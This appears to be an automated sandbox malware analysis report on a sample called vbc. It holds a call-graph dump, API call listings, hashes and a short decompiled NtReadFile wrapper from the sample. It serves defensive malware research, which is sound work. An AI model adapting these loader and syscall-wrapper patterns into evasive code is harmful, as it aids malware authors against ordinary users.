45497 419927 45499 41b7b0 45497->45499 45500 41ad49 45499->45500 45740 41a060 45499->45740 45500->45378 45503 41a950 LdrLoadDll 45502->45503 45504 414b04 45503->45504 45504->45441 45504->45442 45504->45446 45506 419d6c NtCreateFile 45505->45506 45507 41a950 LdrLoadDll 45505->45507 45506->45445 45507->45506 45509 4146cc 45508->45509 45510 419cd0 LdrLoadDll 45509->45510 45511 4146ed 45510->45511 45512 4146f4 45511->45512 45513 414708 45511->45513 45514 419e80 2 API calls 45512->45514 45515 419e80 2 API calls 45513->45515 45516 4146fd 45514->45516 45517 414711 45515->45517 45516->45471 45572 41b9c0 LdrLoadDll RtlAllocateHeap 45517->45572 45519 41471c 45519->45471 45521 41441b 45520->45521 45522 41444e 45520->45522 45524 419cd0 LdrLoadDll 45521->45524 45523 414599 45522->45523 45528 41446a 45522->45528 45525 419cd0 LdrLoadDll 45523->45525 45526 414436 45524->45526 45527 4145b4 45525->45527 45529 419e80 2 API calls 45526->45529 45585 419d10 LdrLoadDll 45527->45585 45530 419cd0 LdrLoadDll 45528->45530 45531 41443f 45529->45531 45532 414485 45530->45532 45531->45473 45534 4144a1 45532->45534 45535 41448c 45532->45535 45538 4144a6 45534->45538 45539 4144bc 45534->45539 45537 419e80 2 API calls 45535->45537 45536 4145ee 45540 419e80 2 API calls 45536->45540 45541 414495 45537->45541 45542 419e80 2 API calls 45538->45542 45547 4144c1 45539->45547 45573 41b980 45539->45573 45544 4145f9 45540->45544 45541->45473 45543 4144af 45542->45543 45543->45473 45544->45473 45555 4144d3 45547->45555 45576 419e00 45547->45576 45548 414527 45549 41453e 45548->45549 45584 419c90 LdrLoadDll 45548->45584 45550 414545 45549->45550 45551 41455a 45549->45551 45553 419e80 2 API calls 45550->45553 45554 419e80 2 API calls 45551->45554 45553->45555 45556 414563 45554->45556 45555->45473 45557 41458f 45556->45557 45579 41b580 45556->45579 45557->45473 45559 41457a 45560 41b7b0 2 API calls 45559->45560 45561 414583 45560->45561 45561->45473 45562->45446 45563->45468 45565 414cd4 45564->45565 45566 41a950 LdrLoadDll 45564->45566 45567 419d10 LdrLoadDll 45565->45567 45566->45565 45567->45470 45569 41a950 LdrLoadDll 45568->45569 45570 419e9c NtClose 45569->45570 45570->45475 45571->45455 45572->45519 45575 41b998 45573->45575 45586 41a020 45573->45586 45575->45547 45577 41a950 LdrLoadDll 45576->45577 45578 419e1c NtReadFile 45577->45578 45578->45548 45580 41b5a4 45579->45580 45581 41b58d 45579->45581 45580->45559 45581->45580 45582 41b980 2 API calls 45581->45582 45583 41b5bb 45582->45583 45583->45559 45584->45549 45585->45536 45587 41a950 LdrLoadDll 45586->45587 45588 41a03c RtlAllocateHeap 45587->45588 45588->45575 45590 41b756 45589->45590 45713 419f30 45590->45713 45592 41b75d 45592->45480 45594 414041 45593->45594 45595 414049 45593->45595 45594->45483 45617 41431c 45595->45617 45716 41c920 45595->45716 45597 41409d 45598 41c920 2 API calls 45597->45598 45602 4140a8 45598->45602 45599 4140f6 45601 41c920 2 API calls 45599->45601 45604 41410a 45601->45604 45602->45599 45721 41c9c0 45602->45721 45603 41c920 2 API calls 45606 41417d 45603->45606 45604->45603 45605 41c920 2 API calls 45612 4141c5 45605->45612 45606->45605 45608 4142f4 45728 41c980 LdrLoadDll RtlFreeHeap 45608->45728 45610 4142fe 45729 41c980 LdrLoadDll RtlFreeHeap 45610->45729 45727 41c980 LdrLoadDll RtlFreeHeap 45612->45727 45613 414308 45730 41c980 LdrLoadDll RtlFreeHeap 45613->45730 45615 414312 45731 41c980 LdrLoadDll RtlFreeHeap 45615->45731 45617->45483 45619 415361 45618->45619 45620 414a10 8 API calls 45619->45620 45622 415377 45620->45622 45621 4153ca 45621->45487 45622->45621 45623 4153b2 45622->45623 45624 4153c5 45622->45624 45625 41b7b0 2 API calls 45623->45625 45626 41b7b0 2 API calls 45624->45626 45627 4153b7 45625->45627 45626->45621 45627->45487 45629 41a774 45628->45629 45630 41a620 LdrLoadDll 45628->45630 45732 41a620 45629->45732 45630->45629 45633 41a620 LdrLoadDll 45634 41a786 45633->45634 45635 41a620 LdrLoadDll 45634->45635 45636 41a78f 45635->45636 45637 41a620 LdrLoadDll 45636->45637 45638 41a798 45637->45638 45639 41a620 LdrLoadDll 45638->45639 45640 41a7a1 45639->45640 45641 41a620 LdrLoadDll 45640->45641 45642 41a7ad 45641->45642 45643 41a620 LdrLoadDll 45642->45643 45644 41a7b6 45643->45644 45645 41a620 LdrLoadDll 45644->45645 45646 41a7bf 45645->45646 45647 41a620 LdrLoadDll 45646->45647 45648 41a7c8 45647->45648 45649 41a620 LdrLoadDll 45648->45649 45650 41a7d1 45649->45650 45651 41a620 LdrLoadDll 45650->45651 45652 41a7da 45651->45652 45653 41a620 LdrLoadDll 45652->45653 45654 41a7e6 45653->45654 45655 41a620 LdrLoadDll 45654->45655 45656 41a7ef 45655->45656 45657 41a620 LdrLoadDll 45656->45657 45658 41a7f8 45657->45658 45659 41a620 LdrLoadDll 45658->45659 45660 41a801 45659->45660 45661 41a620 LdrLoadDll 45660->45661 45662 41a80a 45661->45662 45663 41a620 LdrLoadDll 45662->45663 45664 41a813 45663->45664 45665 41a620 LdrLoadDll 45664->45665 45666 41a81f 45665->45666 45667 41a620 LdrLoadDll 45666->45667 45668 41a828 45667->45668 45669 41a620 LdrLoadDll 45668->45669 45670 41a831 45669->45670 45671 41a620 LdrLoadDll 45670->45671 45672 41a83a 45671->45672 45673 41a620 LdrLoadDll 45672->45673 45674 41a843 45673->45674 45675 41a620 LdrLoadDll 45674->45675 45676 41a84c 45675->45676 45677 41a620 LdrLoadDll 45676->45677 45678 41a858 45677->45678 45679 41a620 LdrLoadDll 45678->45679 45680 41a861 45679->45680 45681 41a620 LdrLoadDll 45680->45681 45682 41a86a 45681->45682 45683 41a620 LdrLoadDll 45682->45683 45684 41a873 45683->45684 45685 41a620 LdrLoadDll 45684->45685 45686 41a87c 45685->45686 45687 41a620 LdrLoadDll 45686->45687 45688 41a885 45687->45688 45689 41a620 LdrLoadDll 45688->45689 45690 41a891 45689->45690 45691 41a620 LdrLoadDll 45690->45691 45692 41a89a 45691->45692 45693 41a620 LdrLoadDll 45692->45693 45694 41a8a3 45693->45694 45695 41a620 LdrLoadDll 45694->45695 45696 41a8ac 45695->45696 45697 41a620 LdrLoadDll 45696->45697 45698 41a8b5 45697->45698 45699 41a620 LdrLoadDll 45698->45699 45700 41a8be 45699->45700 45701 41a620 LdrLoadDll 45700->45701 45702 41a8ca 45701->45702 45703 41a620 LdrLoadDll 45702->45703 45704 41a8d3 45703->45704 45705 41a620 LdrLoadDll 45704->45705 45706 41a8dc 45705->45706 45706->45491 45708 41a950 LdrLoadDll 45707->45708 45709 4198cc 45708->45709 45738 a3fdc0 LdrInitializeThunk 45709->45738 45710 4198e3 45710->45411 45712->45488 45714 419f4c NtAllocateVirtualMemory 45713->45714 45715 41a950 LdrLoadDll 45713->45715 45714->45592 45715->45714 45717 41c930 45716->45717 45718 41c936 45716->45718 45717->45597 45719 41b980 2 API calls 45718->45719 45720 41c95c 45719->45720 45720->45597 45722 41c9e5 45721->45722 45724 41ca1d 45721->45724 45723 41b980 2 API calls 45722->45723 45725 41c9fa 45723->45725 45724->45602 45726 41b7b0 2 API calls 45725->45726 45726->45724 45727->45608 45728->45610 45729->45613 45730->45615 45731->45617 45733 41a63b 45732->45733 45734 414e10 LdrLoadDll 45733->45734 45735 41a65b 45734->45735 45736 414e10 LdrLoadDll 45735->45736 45737 41a707 45735->45737 45736->45737 45737->45633 45738->45710 45739->45497 45741 41a950 LdrLoadDll 45740->45741 45742 41a07c RtlFreeHeap 45741->45742 45742->45500 45744 407e90 45743->45744 45745 407e8b 45743->45745 45746 41b730 2 API calls 45744->45746 45745->45419 45752 407eb5 45746->45752 45747 407f18 45747->45419 45748 4198b0 2 API calls 45748->45752 45749 407f1e 45751 407f44 45749->45751 45753 419fb0 2 API calls 45749->45753 45751->45419 45752->45747 45752->45748 45752->45749 45754 41b730 2 API calls 45752->45754 45759 419fb0 45752->45759 45755 407f35 45753->45755 45754->45752 45755->45419 45757 419fb0 2 API calls 45756->45757 45758 40815e 45757->45758 45758->45380 45760 419fcc 45759->45760 45761 41a950 LdrLoadDll 45759->45761 45764 a3fb68 LdrInitializeThunk 45760->45764 45761->45760 45762 419fe3 45762->45752 45764->45762 45766 41afb3 45765->45766 45769 40acc0 45766->45769 45770 40ace4 45769->45770 45771 40ad20 LdrLoadDll 45770->45771 45772 409c2b 45770->45772 45771->45772 45772->45388 45774 40b033 45773->45774 45776 40b0b0 45774->45776 45788 419680 LdrLoadDll 45774->45788 45776->45393 45778 41a950 LdrLoadDll 45777->45778 45779 40f17b 45778->45779 45779->45396 45780 41a1c0 45779->45780 45781 41a950 LdrLoadDll 45780->45781 45782 41a1df LookupPrivilegeValueW 45781->45782 45782->45398 45784 419c6c 45783->45784 45785 41a950 LdrLoadDll 45783->45785 45789 a3fed0 LdrInitializeThunk 45784->45789 45785->45784 45786 419c8b 45786->45399 45788->45776 45789->45786 45791 40b199 45790->45791 45792 40b010 LdrLoadDll 45791->45792 45793 40b1d4 45792->45793 45793->45335 45795 40ae21 45794->45795 45796 40ae1d 45794->45796 45797 40ae3a 45795->45797 45798 40ae6c 45795->45798 45796->45337 45841 4196c0 LdrLoadDll 45797->45841 45842 4196c0 LdrLoadDll 45798->45842 45800 40ae7d 45800->45337 45802 40ae5c 45802->45337 45804 40f460 3 API calls 45803->45804 45805 414386 45803->45805 45804->45805 45805->45339 45807 408a41 45806->45807 45843 408780 45807->45843 45810 408780 19 API calls 45811 408a6a 45810->45811 45813 408a7d 45811->45813 45861 40f6d0 10 API calls 45811->45861 45813->45341 45815 41a950 LdrLoadDll 45814->45815 45816 419f0c 45815->45816 45980 a3fea0 LdrInitializeThunk 45816->45980 45817 40c2f2 45819 40f460 45817->45819 45820 40f47d 45819->45820 45981 4199b0 45820->45981 45823 40f4c5 45823->45345 45824 419a00 2 API calls 45825 40f4ee 45824->45825 45825->45345 45827 419a1c 45826->45827 45828 41a950 LdrLoadDll 45826->45828 45987 a3fc60 LdrInitializeThunk 45827->45987 45828->45827 45829 40c355 45829->45351 45829->45354 45832 41a950 LdrLoadDll 45831->45832 45833 419a6c 45832->45833 45988 a3fc90 LdrInitializeThunk 45833->45988 45834 40c429 45834->45362 45837 41a950 LdrLoadDll 45836->45837 45838 41982c 45837->45838 45989 a40078 LdrInitializeThunk 45838->45989 45839 40c47c 45839->45366 45841->45802 45842->45800 45844 407e80 4 API calls 45843->45844 45856 40879a 45844->45856 45845 408a29 45845->45810 45845->45813 45846 408a1f 45847 408140 2 API calls 45846->45847 45847->45845 45850 4198f0 2 API calls 45850->45856 45854 40c490 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 45854->45856 45856->45845 45856->45846 45856->45850 45856->45854 45858 419810 2 API calls 45856->45858 45859 419e80 LdrLoadDll NtClose 45856->45859 45862 419700 45856->45862 45865 4085b0 45856->45865 45877 40f5b0 LdrLoadDll NtClose 45856->45877 45878 419780 LdrLoadDll 45856->45878 45879 4197b0 LdrLoadDll 45856->45879 45880 419840 LdrLoadDll 45856->45880 45881 408380 45856->45881 45897 405f40 LdrLoadDll 45856->45897 45858->45856 45859->45856 45861->45813 45863 41a950 LdrLoadDll 45862->45863 45864 41971c 45863->45864 45864->45856 45866 4085c6 45865->45866 45898 419270 45866->45898 45868 4085df 45873 408751 45868->45873 45919 408180 45868->45919 45870 4086c5 45871 408380 11 API calls 45870->45871 45870->45873 45872 4086f3 45871->45872 45872->45873 45874 4198f0 2 API calls 45872->45874 45873->45856 45875 408728 45874->45875 45875->45873 45876 419ef0 2 API calls 45875->45876 45876->45873 45877->45856 45878->45856 45879->45856 45880->45856 45882 4083a9 45881->45882 45959 4082f0 45882->45959 45885 419ef0 2 API calls 45887 4083bc 45885->45887 45886 408447 45886->45856 45887->45885 45887->45886 45889 408442 45887->45889 45967 40f630 45887->45967 45888 419e80 2 API calls 45890 40847a 45888->45890 45889->45888 45890->45886 45891 419700 LdrLoadDll 45890->45891 45892 4084df 45891->45892 45892->45886 45971 419740 45892->45971 45894 408543 45894->45886 45895 414a10 8 API calls 45894->45895 45896 408598 45895->45896 45896->45856 45897->45856 45899 41b980 2 API calls 45898->45899 45900 419287 45899->45900 45926 4092f0 45900->45926 45902 4192a2 45903 4192e0 45902->45903 45904 4192c9 45902->45904 45907 41b730 2 API calls 45903->45907 45905 41b7b0 2 API calls 45904->45905 45906 4192d6 45905->45906 45906->45868 45908 41931a 45907->45908 45909 41b730 2 API calls 45908->45909 45910 419333 45909->45910 45916 4195d4 45910->45916 45932 41b770 45910->45932 45913 4195c0 45914 41b7b0 2 API calls 45913->45914 45915 4195ca 45914->45915 45915->45868 45917 41b7b0 2 API calls 45916->45917 45918 419629 45917->45918 45918->45868 45920 40827f 45919->45920 45921 408195 45919->45921 45920->45870 45921->45920 45922 414a10 8 API calls 45921->45922 45924 408202 45922->45924 45923 408229 45923->45870 45924->45923 45925 41b7b0 2 API calls 45924->45925 45925->45923 45927 409315 45926->45927 45928 40acc0 LdrLoadDll 45927->45928 45929 409348 45928->45929 45931 40936d 45929->45931 45935 40cef0 45929->45935 45931->45902 45953 419f70 45932->45953 45936 40cf1c 45935->45936 45937 419bd0 LdrLoadDll 45936->45937 45938 40cf35 45937->45938 45939 40cf3c 45938->45939 45946 419c10 45938->45946 45939->45931 45943 40cf77 45944 419e80 2 API calls 45943->45944 45945 40cf9a 45944->45945 45945->45931 45947 419c2c 45946->45947 45948 41a950 LdrLoadDll 45946->45948 45952 a3fbb8 LdrInitializeThunk 45947->45952 45948->45947 45949 40cf5f 45949->45939 45951 41a200 LdrLoadDll 45949->45951 45951->45943 45952->45949 45954 41a950 LdrLoadDll 45953->45954 45955 419f8c 45954->45955 45958 a40048 LdrInitializeThunk 45955->45958 45956 4195b9 45956->45913 45956->45916 45958->45956 45960 4082f3 45959->45960 45961 40acc0 LdrLoadDll 45960->45961 45962 408323 45961->45962 45963 414e10 LdrLoadDll 45962->45963 45964 408333 45963->45964 45965 40833c PostThreadMessageW 45964->45965 45966 408350 45964->45966 45965->45966 45966->45887 45968 40f643 45967->45968 45974 419880 45968->45974 45972 41a950 LdrLoadDll 45971->45972 45973 41975c 45972->45973 45973->45894 45975 41989c 45974->45975 45976 41a950 LdrLoadDll 45974->45976 45979 a3fd8c LdrInitializeThunk 45975->45979 45976->45975 45977 40f66e 45977->45887 45979->45977 45980->45817 45982 4199cc 45981->45982 45983 41a950 LdrLoadDll 45981->45983 45986 a3ffb4 LdrInitializeThunk 45982->45986 45983->45982 45984 40f4be 45984->45823 45984->45824 45986->45984 45987->45829 45988->45834 45989->45839 45990 a3f9f0 LdrInitializeThunk 45992 afe751 45993 afe76e 45992->45993 45995 afe8aa 45993->45995 46000 a4e0c6 LdrInitializeThunk LdrInitializeThunk GetPEB 45993->46000 45996 afe79e 45999 afe7a4 45996->45999 46001 a3f900 LdrInitializeThunk 45996->46001 45999->45995 46002 a4e025 LdrInitializeThunk LdrInitializeThunk GetPEB 45999->46002 46000->45996 46001->45999 46002->45995

                                            Executed Functions

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 0 419e00-419e49 call 41a950 NtReadFile
                                            C-Code - Quality: 37%
                                            			E00419E00(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
                                            				void* _t18;
                                            				void* _t27;
                                            				intOrPtr* _t28;
                                            
                                            				_t13 = _a4;
                                            				_t28 = _a4 + 0xc48;
                                            				E0041A950(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                            				_t6 =  &_a32; // 0x414d32
                                            				_t12 =  &_a8; // 0x414d32
                                            				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
                                            				return _t18;
                                            			}






                                            0x00419e03
                                            0x00419e0f
                                            0x00419e17
                                            0x00419e22
                                            0x00419e3d
                                            0x00419e45
                                            0x00419e49

                                            APIs
                                            • NtReadFile.NTDLL(2MA,5EB6522D,FFFFFFFF,004149F1,?,?,2MA,?,004149F1,FFFFFFFF,5EB6522D,00414D32,?,00000000), ref: 00419E45
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FileRead
                                            • String ID: 2MA$2MA
                                            • API String ID: 2738559852-947276439
                                            • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                            • Instruction ID: e2eeafcdabc96c90d19f56ab9cfe9238ee24689222a5818d11d4b5cf4f7c0d6d
                                            • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                            • Instruction Fuzzy Hash: 90F0B7B2210208AFCB14DF89DC91EEB77ADEF8C754F158649BE1D97241D630E851CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 21 419d4a-419da1 call 41a950 NtCreateFile
                                            APIs
                                            • NtCreateFile.NTDLL(00000060,00409CC3,?,wKA,00409CC3,FFFFFFFF,?,?,FFFFFFFF,00409CC3,00414B77,?,00409CC3,00000060,00000000,00000000), ref: 00419D9D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID: wKA
                                            • API String ID: 823142352-3165208591
                                            • Opcode ID: 7ab8469d83ad9bd10d0e6db8322583e6e74e3138565224800667b1ee1b7d3bde
                                            • Instruction ID: 9ed6e26d88a505840e18b06861ebfba83fffb53acf388e89c63ac865cd2a6e33
                                            • Opcode Fuzzy Hash: 7ab8469d83ad9bd10d0e6db8322583e6e74e3138565224800667b1ee1b7d3bde
                                            • Instruction Fuzzy Hash: 7501F2B2201108AFCB08CF89CC91EEB37A9BF8C354F118248FA1C97241C630E851CBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 24 419d50-419d66 25 419d6c-419da1 NtCreateFile 24->25 26 419d67 call 41a950 24->26 26->25
                                            APIs
                                            • NtCreateFile.NTDLL(00000060,00409CC3,?,wKA,00409CC3,FFFFFFFF,?,?,FFFFFFFF,00409CC3,00414B77,?,00409CC3,00000060,00000000,00000000), ref: 00419D9D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID: wKA
                                            • API String ID: 823142352-3165208591
                                            • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                            • Instruction ID: 0d977cd1f4fbd36c9bd444ef8f6a04c43f7f15de33bda2cf86b45a3658e1eede
                                            • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                            • Instruction Fuzzy Hash: BFF0BDB2211208AFCB08CF89DC95EEB77ADAF8C754F158248BA1D97241C630E8518BA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 291 40acc0-40ace9 call 41c640 294 40aceb-40acee 291->294 295 40acef-40acfd call 41ca60 291->295 298 40ad0d-40ad1e call 41ae90 295->298 299 40acff-40ad0a call 41cce0 295->299 304 40ad20-40ad34 LdrLoadDll 298->304 305 40ad37-40ad3a 298->305 299->298 304->305
                                            APIs
                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD32
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Load
                                            • String ID:
                                            • API String ID: 2234796835-0
                                            • Opcode ID: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                            • Instruction ID: 8d9c8c5cc187846e167d7fc499b748faaade23025a89af1130ee390205ce80a6
                                            • Opcode Fuzzy Hash: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                            • Instruction Fuzzy Hash: C40152B5D4020DA7DB10DBE5DC42FDEB7789F14308F0041AAE908A7281F634EB54C795
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 306 419f2a-419f6d call 41a950 NtAllocateVirtualMemory
                                            APIs
                                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB24,?,00000000,?,00003000,00000040,00000000,00000000,00409CC3), ref: 00419F69
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateMemoryVirtual
                                            • String ID:
                                            • API String ID: 2167126740-0
                                            • Opcode ID: 53d5a4eeab02fea0f899319b816af1ebeb7531070fdd4f966839788e8bcbef93
                                            • Instruction ID: f7523287f29d6fe6f2cf7956ba2f0c2abdca80545f7a8a6e2d1ce2ccf1de4634
                                            • Opcode Fuzzy Hash: 53d5a4eeab02fea0f899319b816af1ebeb7531070fdd4f966839788e8bcbef93
                                            • Instruction Fuzzy Hash: 6BF058B2210208AFDB14DF98CC81EEB77A8EF88358F118549FE1CA7241C234E811CBE1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 309 419f30-419f46 310 419f4c-419f6d NtAllocateVirtualMemory 309->310 311 419f47 call 41a950 309->311 311->310
                                            APIs
                                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB24,?,00000000,?,00003000,00000040,00000000,00000000,00409CC3), ref: 00419F69
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateMemoryVirtual
                                            • String ID:
                                            • API String ID: 2167126740-0
                                            • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                            • Instruction ID: c2721ea4e084a79d388e091216dcc94a475298a8aa449db6134383b78daf1f40
                                            • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                            • Instruction Fuzzy Hash: 7DF015B2210208AFCB14DF89CC81EEB77ADAF88754F118549BE1897241C630F810CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • NtClose.NTDLL(00414D10,?,?,00414D10,00409CC3,FFFFFFFF), ref: 00419EA5
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Close
                                            • String ID:
                                            • API String ID: 3535843008-0
                                            • Opcode ID: 076a299f7c407e1331a305a4888a038f6a5f5e7c31a648711791beeed5cdc0c0
                                            • Instruction ID: 139aa4a7a0a911ada602052342df41cd9bde445464c7247a71f2d17c10fc803e
                                            • Opcode Fuzzy Hash: 076a299f7c407e1331a305a4888a038f6a5f5e7c31a648711791beeed5cdc0c0
                                            • Instruction Fuzzy Hash: C3E0DF712403007BCA14DBD5CC45E977B6CEF05330F11405AFA095B242C530A54086E1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • NtClose.NTDLL(00414D10,?,?,00414D10,00409CC3,FFFFFFFF), ref: 00419EA5
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Close
                                            • String ID:
                                            • API String ID: 3535843008-0
                                            • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                            • Instruction ID: abd226b249efdbe90954a2e5a1f5a103ee35f8531edac2b51595525400ebd06d
                                            • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                            • Instruction Fuzzy Hash: FED01776200214ABD710EB99CC86EE77BACEF48760F15449ABA5C9B242C530FA5086E0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.507308179.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                            • Associated: 00000005.00000002.507296853.0000000000A20000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507950798.0000000000B10000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507972739.0000000000B20000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507996526.0000000000B24000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508023829.0000000000B27000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508086796.0000000000B30000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508145129.0000000000B90000.00000040.00000001.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_a20000_vbc.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                            • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                            • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                            • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.507308179.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                            • Associated: 00000005.00000002.507296853.0000000000A20000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507950798.0000000000B10000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507972739.0000000000B20000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507996526.0000000000B24000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508023829.0000000000B27000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508086796.0000000000B30000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508145129.0000000000B90000.00000040.00000001.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_a20000_vbc.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                            • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                                            • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                            • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.507308179.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                            • Associated: 00000005.00000002.507296853.0000000000A20000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507950798.0000000000B10000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507972739.0000000000B20000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507996526.0000000000B24000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508023829.0000000000B27000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508086796.0000000000B30000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508145129.0000000000B90000.00000040.00000001.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_a20000_vbc.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
